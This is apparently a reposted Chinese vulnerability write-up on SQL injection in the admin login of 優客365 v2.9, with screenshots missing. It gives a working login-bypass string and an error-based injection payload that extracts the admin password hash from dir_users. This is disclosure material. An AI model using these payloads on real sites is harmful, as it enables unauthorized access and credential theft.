1. 程式人生 > >優客365 v2.9版本 後臺存在SQL註入

優客365 v2.9版本 後臺存在SQL註入

-- src login php ima 分享 format cnblogs mod

安裝

技術分享

打開後臺登陸界面

http://localhost:9096/yk365/system/login.php

輸入單引號報錯

技術分享

得到表名

經過跟蹤後在\module\login.php文件出現錯誤

技術分享

代碼處理不嚴謹。根據上圖,經測試,用戶名可以用1‘ or ‘1‘=‘1進行繞過

但密碼經過md5加密

接下來通過SQL註入得到md5加密後的密碼

技術分享

payload: and (select 1 from(select count(*),concat(0x7e,(select user_pass from dir_users where user_id=1),0x7e,floor(rand(0)*2)) x from information_schema.columns group by x)a)--+

技術分享

用sqlmap跑的時候跑不出

可以利用此方法在不知道用戶名的情況下登陸進後臺

優客365 v2.9版本 後臺存在SQL註入